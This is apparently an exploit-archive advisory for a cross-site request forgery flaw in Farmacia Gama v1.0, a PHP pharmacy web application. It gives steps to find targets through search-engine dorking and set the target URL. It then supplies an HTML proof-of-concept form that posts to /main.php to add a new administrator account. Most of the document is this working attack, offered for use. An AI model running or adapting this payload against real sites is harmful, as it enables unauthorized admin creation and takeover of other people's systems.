Farmacia Gama version 1.0 Farmacia Gama version 1.0 suffers from a cross site request forgery vulnerability.
54c9db8b6277d282699823fdb83ba0f1b4aa2c95b1aa9fef358765f2383e0613
=============================================================================================================================================
| # Title : Farmacia Gama v1.0 v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following HTML code add new admin .
[+] Go to the line 10 Set the target site link Save changes and apply .
[+] infected file : /main.php.
[+] save code as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Farmacia Form</title>
</head>
<body>
<h2>Farmacia User Form</h2>
<form action="http://127.0.0.1/farmacia-master/main.php" method="POST">
<label for="nome">Nome:</label>
<input type="text" id="nome" name="nome" required><br><br>
<label for="cargo">Cargo:</label>
<input type="text" id="cargo" name="cargo" required><br><br>
<label for="usuario">Usuário:</label>
<input type="text" id="usuario" name="usuario" required><br><br>
<label for="senha">Senha:</label>
<input type="password" id="senha" name="senha" required><br><br>
<button type="submit" name="acao">Submit</button>
</form>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================